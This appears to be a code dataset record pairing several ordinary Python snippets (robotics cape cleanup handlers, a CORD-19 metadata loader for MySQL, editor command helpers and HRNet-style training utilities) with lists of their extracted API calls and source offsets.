# get state pipes
pipes = _get_state_pipe_list()
if len(pipes):
print('{} pipes open'.format(len(pipes)))
# set state as exiting
set_state(EXITING)
print('Calling roboticscape cleanup')
# call robotics cape cleanup
_cleanup()
if len(pipes):
print('Closing pipes')
# close open pipes left
while len(pipes):
destroy_pipe(pipes[0])
print('Dnoe with cleanup')
# idle function
def idle():
set_state(IDLE)
# run function
def run():
set_state(RUNNING)
# pause function
def pause():
set_state(PAUSED)
# exit function
def exit():
set_state(EXITING)
# cleanup handler
def handler(signum, frame):
# warn
warnings.warn('Signal handler called with signal {}'.format(signum))
# call rcpy cleanup
cleanup()
# no need to cleanup later
atexit.unregister(cleanup)
warnings.warn('> Robotics cape exited cleanly')
raise KeyboardInterrupt()
# initialize cape
initialize()
# set initial state
set_state(PAUSED)
warnings.warn('> Robotics cape initialized')
# make sure it is disabled when exiting cleanly
import atexit; atexit.register(cleanup)
if 'RCPY_NO_HANDLERS' in os.environ:
warnings.warn('> RCPY_NO_HANDLERS is set. User is responsible for handling signals')
else:
# install handler
warnings.warn('> Installing signal handlers')
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGTERM, handler)
|
[
"atexit.register",
"os.pipe",
"os.close",
"rcpy._rcpy.set_state",
"warnings.warn",
"signal.signal",
"rcpy._rcpy.cleanup",
"atexit.unregister",
"rcpy._rcpy.initialize"
] |
[((2471, 2483), 'rcpy._rcpy.initialize', 'initialize', ([], {}), '()\n', (2481, 2483), False, 'from rcpy._rcpy import initialize, cleanup, get_state\n'), ((2523, 2567), 'warnings.warn', 'warnings.warn', (['"""> Robotics cape initialized"""'], {}), "('> Robotics cape initialized')\n", (2536, 2567), False, 'import warnings\n'), ((2632, 2656), 'atexit.register', 'atexit.register', (['cleanup'], {}), '(cleanup)\n', (2647, 2656), False, 'import atexit\n'), ((542, 551), 'os.pipe', 'os.pipe', ([], {}), '()\n', (549, 551), False, 'import sys, os, time\n'), ((717, 731), 'os.close', 'os.close', (['r_fd'], {}), '(r_fd)\n', (725, 731), False, 'import sys, os, time\n'), ((736, 750), 'os.close', 'os.close', (['w_fd'], {}), '(w_fd)\n', (744, 750), False, 'import sys, os, time\n'), ((951, 968), 'rcpy._rcpy.set_state', '_set_state', (['state'], {}), '(state)\n', (961, 968), True, 'from rcpy._rcpy import set_state as _set_state\n'), ((1711, 1721), 'rcpy._rcpy.cleanup', '_cleanup', ([], {}), '()\n', (1719, 1721), True, 'from rcpy._rcpy import cleanup as _cleanup\n'), ((2287, 2296), 'rcpy._rcpy.cleanup', 'cleanup', ([], {}), '()\n', (2294, 2296), False, 'from rcpy._rcpy import initialize, cleanup, get_state\n'), ((2337, 2363), 'atexit.unregister', 'atexit.unregister', (['cleanup'], {}), '(cleanup)\n', (2354, 2363), False, 'import atexit\n'), ((2369, 2416), 'warnings.warn', 'warnings.warn', (['"""> Robotics cape exited cleanly"""'], {}), "('> Robotics cape exited cleanly')\n", (2382, 2416), False, 'import warnings\n'), ((2699, 2788), 'warnings.warn', 'warnings.warn', (['"""> RCPY_NO_HANDLERS is set. User is responsible for handling signals"""'], {}), "(\n '> RCPY_NO_HANDLERS is set. User is responsible for handling signals')\n", (2712, 2788), False, 'import warnings\n'), ((2822, 2867), 'warnings.warn', 'warnings.warn', (['"""> Installing signal handlers"""'], {}), "('> Installing signal handlers')\n", (2835, 2867), False, 'import warnings\n'), ((2872, 2909), 'signal.signal', 'signal.signal', (['signal.SIGINT', 'handler'], {}), '(signal.SIGINT, handler)\n', (2885, 2909), False, 'import signal\n'), ((2914, 2952), 'signal.signal', 'signal.signal', (['signal.SIGTERM', 'handler'], {}), '(signal.SIGTERM, handler)\n', (2927, 2952), False, 'import signal\n')]
|
#------------------------------------------ EXTRACT DATA FROM METADATA.CSV -------------------------------------------------
#
# our table has the same structrure as the csv file downloaded
#
#
#--------------------------------------------------------------------------------------------------------------------------------
import pandas as pd
import unicodedata
import re
import string
import csv
import json
import itertools
from joblib import Parallel, delayed
import collections
from collections import Counter,defaultdict,OrderedDict,namedtuple
import mysql.connector
from settings import DB_CREDS
#establish a connection with the database
cnx = mysql.connector.connect(
host = DB_CREDS['host'],
user = DB_CREDS['user'],
passwd = DB_CREDS['pass'],
database = DB_CREDS['db']
)
cursor = cnx.cursor()
df = pd.read_csv('metadata.csv',low_memory=False)
#fill all null cells
df.fillna(" ",inplace=True)
index=0
for i in df.loc[:,'cord_uid']:
#if there is only the year given fill the rest date with year-1-1
if len(df.loc[index,'publish_time']) == 4:
year = df.loc[index,'publish_time']
df.loc[index,'publish_time'] = year + '-1-1'
#'pubmed_id is given in the database as int, make sure there are no empty spaces
if df.loc[index,'pubmed_id'] == ' ':
df.loc[index,'pubmed_id'] = 0
#save tha extracted data in a tuple
data = (df.loc[index,'cord_uid'],df.loc[index,'sha'],df.loc[index,'source_x'],df.loc[index,'title'],df.loc[index,'doi'],df.loc[index,'pmcid'],df.loc[index,'pubmed_id'],df.loc[index,'license'],df.loc[index,'abstract'],df.loc[index,'publish_time'],df.loc[index,'authors'],df.loc[index,'journal'],df.loc[index,'mag_id'],df.loc[index,'who_covidence_id'],df.loc[index,'arxiv_id'],df.loc[index,'pdf_json_files'],df.loc[index,'pmc_json_files'],df.loc[index,'url'],df.loc[index,'s2_id'])
#insert our data into our database
add_data = ("INSERT IGNORE INTO general "
"(cord_uid , sha, source_x, title, doi, pmcid, pubmed_id, license, abstract, publish_time, authors, journal, mag_id, who_covidence_id, arxiv_id, pdf_json_files, pmc_json_files, url, s2_id) "
"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)")
cursor.execute(add_data,data)
cnx.commit()
index += 1
cursor.close()
cnx.close()
|
[
"pandas.read_csv"
] |
[((877, 922), 'pandas.read_csv', 'pd.read_csv', (['"""metadata.csv"""'], {'low_memory': '(False)'}), "('metadata.csv', low_memory=False)\n", (888, 922), True, 'import pandas as pd\n')]
|
from __future__ import annotations
import dataclasses
import os
from pathlib import Path
from typing import Dict, List, Optional
from porcupine import tabs, utils
@dataclasses.dataclass
class Command:
command_format: str
cwd_format: str
external_terminal: bool
substitutions: Dict[str, str]
def format_cwd(self) -> Path:
return Path(self.cwd_format.format(**self.substitutions))
def format_command(self) -> str:
return self.command_format.format(
**{name: utils.quote(value) for name, value in self.substitutions.items()}
)
@dataclasses.dataclass
class ExampleCommand:
command: str
windows_command: Optional[str] = None
macos_command: Optional[str] = None
working_directory: str = "{folder_path}"
external_terminal: bool = True
class Context:
def __init__(self, tab: tabs.FileTab, key_id: int):
assert tab.path is not None
self.file_path = tab.path
self.project_path = utils.find_project_root(tab.path)
self.key_id = key_id # with default bindings: 0 = F5, 1 = F6, 2 = F7, 3 = F8
self.filetype_name: str | None = tab.settings.get("filetype_name", Optional[str])
self.example_commands: list[ExampleCommand] = tab.settings.get(
"example_commands", List[ExampleCommand]
)
def get_substitutions(self) -> dict[str, str]:
return {
"file_stem": self.file_path.stem,
"file_name": self.file_path.name,
"file_path": str(self.file_path),
"folder_name": self.file_path.parent.name,
"folder_path": str(self.file_path.parent),
"project_name": self.project_path.name,
"project_path": str(self.project_path),
}
def prepare_env() -> dict[str, str]:
env = dict(os.environ)
# If Porcupine is running within a virtualenv, ignore it
if "VIRTUAL_ENV" in env and "PATH" in env:
# os.pathsep = ":"
# os.sep = "/"
porcu_venv = env.pop("VIRTUAL_ENV")
env["PATH"] = os.pathsep.join(
p for p in env["PATH"].split(os.pathsep) if not p.startswith(porcu_venv + os.sep)
)
return env
|
[
"porcupine.utils.quote",
"porcupine.utils.find_project_root"
] |
[((987, 1020), 'porcupine.utils.find_project_root', 'utils.find_project_root', (['tab.path'], {}), '(tab.path)\n', (1010, 1020), False, 'from porcupine import tabs, utils\n'), ((514, 532), 'porcupine.utils.quote', 'utils.quote', (['value'], {}), '(value)\n', (525, 532), False, 'from porcupine import tabs, utils\n')]
|
# Modified based on the HRNet repo.
from __future__ import absolute_import, division, print_function
import logging
import os
import time
from pathlib import Path
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
class FullModel(nn.Module):
"""
Distribute the loss on multi-gpu to reduce
the memory cost in the main gpu.
You can check the following discussion.
https://discuss.pytorch.org/t/dataparallel-imbalanced-memory-usage/22551/21
"""
def __init__(self, model, loss):
super(FullModel, self).__init__()
self.model = model
self.loss = loss
def forward(self, inputs, labels, train_step=-1, **kwargs):
outputs, jac_loss, sradius = self.model(inputs, train_step=train_step, **kwargs)
loss = self.loss(outputs, labels)
return loss.unsqueeze(0), jac_loss.unsqueeze(0), outputs, sradius
def get_world_size():
if not torch.distributed.is_initialized():
return 1
return torch.distributed.get_world_size()
def get_rank():
if not torch.distributed.is_initialized():
return 0
return torch.distributed.get_rank()
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.initialized = False
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def initialize(self, val, weight):
self.val = val
self.avg = val
self.sum = val * weight
self.count = weight
self.initialized = True
def update(self, val, weight=1):
if not self.initialized:
self.initialize(val, weight)
else:
self.add(val, weight)
def add(self, val, weight):
self.val = val
self.sum += val * weight
self.count += weight
self.avg = self.sum / self.count
def value(self):
return self.val
def average(self):
return self.avg
def create_logger(cfg, cfg_name, phase="train"):
root_output_dir = Path(cfg.OUTPUT_DIR)
# set up logger
if not root_output_dir.exists():
print("=> creating {}".format(root_output_dir))
root_output_dir.mkdir()
dataset = cfg.DATASET.DATASET
model = cfg.MODEL.NAME
cfg_name = os.path.basename(cfg_name).split(".")[0]
final_output_dir = root_output_dir / dataset / cfg_name
print("=> creating {}".format(final_output_dir))
final_output_dir.mkdir(parents=True, exist_ok=True)
time_str = time.strftime("%Y-%m-%d-%H-%M")
log_file = "{}_{}_{}.log".format(cfg_name, time_str, phase)
final_log_file = final_output_dir / log_file
head = "%(asctime)-15s %(message)s"
logging.basicConfig(filename=str(final_log_file), format=head)
logger = logging.getLogger()
logger.setLevel(logging.INFO)
console = logging.StreamHandler()
logging.getLogger("").addHandler(console)
tensorboard_log_dir = Path(cfg.LOG_DIR) / dataset / model / cfg_name
print("=> creating {}".format(tensorboard_log_dir))
tensorboard_log_dir.mkdir(parents=True, exist_ok=True)
return logger, str(final_output_dir), str(tensorboard_log_dir)
def get_optimizer(cfg, model):
optimizer = None
if cfg.TRAIN.OPTIMIZER == "sgd":
optimizer = optim.SGD(
filter(lambda p: p.requires_grad, model.parameters()),
lr=cfg.TRAIN.LR,
momentum=cfg.TRAIN.MOMENTUM,
weight_decay=cfg.TRAIN.WD,
nesterov=cfg.TRAIN.NESTEROV,
)
elif cfg.TRAIN.OPTIMIZER == "adam":
optimizer = optim.Adam(
filter(lambda p: p.requires_grad, model.parameters()),
lr=cfg.TRAIN.LR,
weight_decay=cfg.TRAIN.WD,
)
elif cfg.TRAIN.OPTIMIZER == "rmsprop":
optimizer = optim.RMSprop(
filter(lambda p: p.requires_grad, model.parameters()),
lr=cfg.TRAIN.LR,
momentum=cfg.TRAIN.MOMENTUM,
weight_decay=cfg.TRAIN.WD,
alpha=cfg.TRAIN.RMSPROP_ALPHA,
centered=cfg.TRAIN.RMSPROP_CENTERED,
)
return optimizer
def save_checkpoint(states, is_best, output_dir, filename="checkpoint.pth.tar"):
torch.save(states, os.path.join(output_dir, filename))
if is_best and "state_dict" in states:
torch.save(states["state_dict"], os.path.join(output_dir, "model_best.pth.tar"))
def get_confusion_matrix(label, pred, size, num_class, ignore=-1):
"""
Calcute the confusion matrix by given label and pred
"""
output = pred.cpu().numpy().transpose(0, 2, 3, 1)
seg_pred = np.asarray(np.argmax(output, axis=3), dtype=np.uint8)
seg_gt = np.asarray(label.cpu().numpy()[:, : size[-2], : size[-1]], dtype=np.int)
ignore_index = seg_gt != ignore
seg_gt = seg_gt[ignore_index]
seg_pred = seg_pred[ignore_index]
index = (seg_gt * num_class + seg_pred).astype("int32")
label_count = np.bincount(index)
confusion_matrix = np.zeros((num_class, num_class))
for i_label in range(num_class):
for i_pred in range(num_class):
cur_index = i_label * num_class + i_pred
if cur_index < len(label_count):
confusion_matrix[i_label, i_pred] = label_count[cur_index]
return confusion_matrix
def adjust_learning_rate(optimizer, base_lr, max_iters, cur_iters, power=0.9):
lr = base_lr * ((1 - float(cur_iters) / max_iters) ** (power))
optimizer.param_groups[0]["lr"] = lr
return lr
################################################################################
# The following function are based on:
# https://github.com/espnet/espnet/blob/master/espnet/nets/pytorch_backend/nets_utils.py
def make_pad_mask(lengths, xs=None, length_dim=-1):
"""Make mask tensor containing indices of padded part.
Args:
lengths (LongTensor or List): Batch of lengths (B,).
xs (Tensor, optional): The reference tensor.
If set, masks will be the same shape as this tensor.
length_dim (int, optional): Dimension indicator of the above tensor.
See the example.
Returns:
Tensor: Mask tensor containing indices of padded part.
dtype=torch.uint8 in PyTorch 1.2-
dtype=torch.bool in PyTorch 1.2+ (including 1.2)
Examples:
With only lengths.
>>> lengths = [5, 3, 2]
>>> make_non_pad_mask(lengths)
masks = [[0, 0, 0, 0 ,0],
[0, 0, 0, 1, 1],
[0, 0, 1, 1, 1]]
With the reference tensor.
>>> xs = torch.zeros((3, 2, 4))
>>> make_pad_mask(lengths, xs)
tensor([[[0, 0, 0, 0],
[0, 0, 0, 0]],
[[0, 0, 0, 1],
[0, 0, 0, 1]],
[[0, 0, 1, 1],
[0, 0, 1, 1]]], dtype=torch.uint8)
>>> xs = torch.zeros((3, 2, 6))
>>> make_pad_mask(lengths, xs)
tensor([[[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1]],
[[0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 1, 1]],
[[0, 0, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1]]], dtype=torch.uint8)
With the reference tensor and dimension indicator.
>>> xs = torch.zeros((3, 6, 6))
>>> make_pad_mask(lengths, xs, 1)
tensor([[[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1]],
[[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]],
[[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]]], dtype=torch.uint8)
>>> make_pad_mask(lengths, xs, 2)
tensor([[[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1]],
[[0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 1, 1]],
[[0, 0, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1]]], dtype=torch.uint8)
"""
if length_dim == 0:
raise ValueError("length_dim cannot be 0: {}".format(length_dim))
if not isinstance(lengths, list):
lengths = lengths.tolist()
bs = int(len(lengths))
if xs is None:
maxlen = int(max(lengths))
else:
maxlen = xs.size(length_dim)
seq_range = torch.arange(0, maxlen, dtype=torch.int64)
seq_range_expand = seq_range.unsqueeze(0).expand(bs, maxlen)
seq_length_expand = seq_range_expand.new(lengths).unsqueeze(-1)
mask = seq_range_expand >= seq_length_expand
if xs is not None:
assert xs.size(0) == bs, (xs.size(0), bs)
if length_dim < 0:
length_dim = xs.dim() + length_dim
# ind = (:, None, ..., None, :, , None, ..., None)
ind = tuple(
slice(None) if i in (0, length_dim) else None for i in range(xs.dim())
)
mask = mask[ind].expand_as(xs).to(xs.device)
return mask
def make_non_pad_mask(lengths, xs=None, length_dim=-1):
"""Make mask tensor containing indices of non-padded part.
Args:
lengths (LongTensor or List): Batch of lengths (B,).
xs (Tensor, optional): The reference tensor.
If set, masks will be the same shape as this tensor.
length_dim (int, optional): Dimension indicator of the above tensor.
See the example.
Returns:
ByteTensor: mask tensor containing indices of padded part.
dtype=torch.uint8 in PyTorch 1.2-
dtype=torch.bool in PyTorch 1.2+ (including 1.2)
Examples:
With only lengths.
>>> lengths = [5, 3, 2]
>>> make_non_pad_mask(lengths)
masks = [[1, 1, 1, 1 ,1],
[1, 1, 1, 0, 0],
[1, 1, 0, 0, 0]]
With the reference tensor.
>>> xs = torch.zeros((3, 2, 4))
>>> make_non_pad_mask(lengths, xs)
tensor([[[1, 1, 1, 1],
[1, 1, 1, 1]],
[[1, 1, 1, 0],
[1, 1, 1, 0]],
[[1, 1, 0, 0],
[1, 1, 0, 0]]], dtype=torch.uint8)
>>> xs = torch.zeros((3, 2, 6))
>>> make_non_pad_mask(lengths, xs)
tensor([[[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 0]],
[[1, 1, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0]],
[[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0]]], dtype=torch.uint8)
With the reference tensor and dimension indicator.
>>> xs = torch.zeros((3, 6, 6))
>>> make_non_pad_mask(lengths, xs, 1)
tensor([[[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0]],
[[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]],
[[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]]], dtype=torch.uint8)
>>> make_non_pad_mask(lengths, xs, 2)
tensor([[[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 0]],
[[1, 1, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0]],
[[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0]]], dtype=torch.uint8)
"""
return ~make_pad_mask(lengths, xs, length_dim)
|
[
"torch.distributed.is_initialized",
"numpy.argmax",
"torch.distributed.get_rank",
"os.path.basename",
"logging.StreamHandler",
"numpy.zeros",
"time.strftime",
"pathlib.Path",
"torch.arange",
"torch.distributed.get_world_size",
"numpy.bincount",
"os.path.join",
"logging.getLogger"
] |
[((1003, 1037), 'torch.distributed.get_world_size', 'torch.distributed.get_world_size', ([], {}), '()\n', (1035, 1037), False, 'import torch\n'), ((1131, 1159), 'torch.distributed.get_rank', 'torch.distributed.get_rank', ([], {}), '()\n', (1157, 1159), False, 'import torch\n'), ((2058, 2078), 'pathlib.Path', 'Path', (['cfg.OUTPUT_DIR'], {}), '(cfg.OUTPUT_DIR)\n', (2062, 2078), False, 'from pathlib import Path\n'), ((2529, 2560), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d-%H-%M"""'], {}), "('%Y-%m-%d-%H-%M')\n", (2542, 2560), False, 'import time\n'), ((2794, 2813), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (2811, 2813), False, 'import logging\n'), ((2862, 2885), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (2883, 2885), False, 'import logging\n'), ((4946, 4964), 'numpy.bincount', 'np.bincount', (['index'], {}), '(index)\n', (4957, 4964), True, 'import numpy as np\n'), ((4988, 5020), 'numpy.zeros', 'np.zeros', (['(num_class, num_class)'], {}), '((num_class, num_class))\n', (4996, 5020), True, 'import numpy as np\n'), ((9070, 9112), 'torch.arange', 'torch.arange', (['(0)', 'maxlen'], {'dtype': 'torch.int64'}), '(0, maxlen, dtype=torch.int64)\n', (9082, 9112), False, 'import torch\n'), ((939, 973), 'torch.distributed.is_initialized', 'torch.distributed.is_initialized', ([], {}), '()\n', (971, 973), False, 'import torch\n'), ((1067, 1101), 'torch.distributed.is_initialized', 'torch.distributed.is_initialized', ([], {}), '()\n', (1099, 1101), False, 'import torch\n'), ((4239, 4273), 'os.path.join', 'os.path.join', (['output_dir', 'filename'], {}), '(output_dir, filename)\n', (4251, 4273), False, 'import os\n'), ((4629, 4654), 'numpy.argmax', 'np.argmax', (['output'], {'axis': '(3)'}), '(output, axis=3)\n', (4638, 4654), True, 'import numpy as np\n'), ((2890, 2911), 'logging.getLogger', 'logging.getLogger', (['""""""'], {}), "('')\n", (2907, 2911), False, 'import logging\n'), ((4359, 4405), 'os.path.join', 'os.path.join', (['output_dir', '"""model_best.pth.tar"""'], {}), "(output_dir, 'model_best.pth.tar')\n", (4371, 4405), False, 'import os\n'), ((2301, 2327), 'os.path.basename', 'os.path.basename', (['cfg_name'], {}), '(cfg_name)\n', (2317, 2327), False, 'import os\n'), ((2959, 2976), 'pathlib.Path', 'Path', (['cfg.LOG_DIR'], {}), '(cfg.LOG_DIR)\n', (2963, 2976), False, 'from pathlib import Path\n')]
|